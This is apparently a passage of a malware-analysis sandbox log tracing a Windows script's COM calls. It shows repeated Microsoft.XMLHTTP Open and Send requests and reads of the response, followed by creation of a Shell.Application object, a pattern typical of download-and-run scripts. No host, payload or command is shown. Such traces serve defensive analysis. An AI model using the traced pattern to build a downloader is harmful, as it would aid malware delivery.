	[0392.638] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0392.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0392.639] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0392.639] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0392.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7358) returned 0x0
	[0392.639] ??2@YAPEAX_K@Z () returned 0x62f330
	[0392.639] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7358, pUnkSite=0x62f330) 
	[0392.639] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0392.639] XMLHTTPRequest:IUnknown:Release (This=0x49c7358) returned 0x0
	[0392.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0392.639] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0392.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0392.639] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0392.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0392.640] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0392.640] SysStringLen (param_1=0x0) returned 0x0
	[0392.640] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0392.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0392.640] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0392.640] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0392.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0392.640] ??2@YAPEAX_K@Z () returned 0x62f310
	[0392.640] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0392.640] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0392.640] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0392.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0392.640] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0392.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0392.640] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0392.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0392.640] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0392.641] SysStringLen (param_1=0x0) returned 0x0
	[0392.641] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0392.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0392.641] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0392.641] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0392.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0392.641] ??2@YAPEAX_K@Z () returned 0x62f330
	[0392.641] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f330) 
	[0392.641] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0392.641] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0392.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0392.641] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0392.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0392.641] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0392.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0392.641] longjmp () 
	[0392.642] longjmp () 
	[0392.642] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0392.642] SysStringLen (param_1=0x0) returned 0x0
	[0392.642] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0392.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0392.642] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0392.642] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0392.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0392.642] ??2@YAPEAX_K@Z () returned 0x62f310
	[0392.642] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f310) 
	[0392.642] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0392.642] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0392.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0392.642] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0392.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0392.642] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0392.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0392.642] longjmp () 
	[0392.643] longjmp () 
	[0392.643] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0392.643] SysStringLen (param_1=0x0) returned 0x0
	[0392.643] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0392.643] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0392.643] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0392.643] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0392.643] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0392.643] ??2@YAPEAX_K@Z () returned 0x62f330
	[0392.643] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f330) 
	[0392.643] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0392.643] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0392.643] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0392.643] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0392.643] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0392.643] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0392.643] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0392.644] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0392.644] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0392.644] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0392.807] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0392.807] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0392.807] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0392.807] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0392.807] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0392.807] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0392.808] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0392.808] SysStringLen (param_1=0x0) returned 0x0
	[0392.808] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0392.808] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0392.808] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0392.808] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0392.808] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0392.808] ??2@YAPEAX_K@Z () returned 0x62f350
	[0392.808] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0392.808] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0392.808] Shell:IUnknown:Release (This=0x396860) returned 0x1
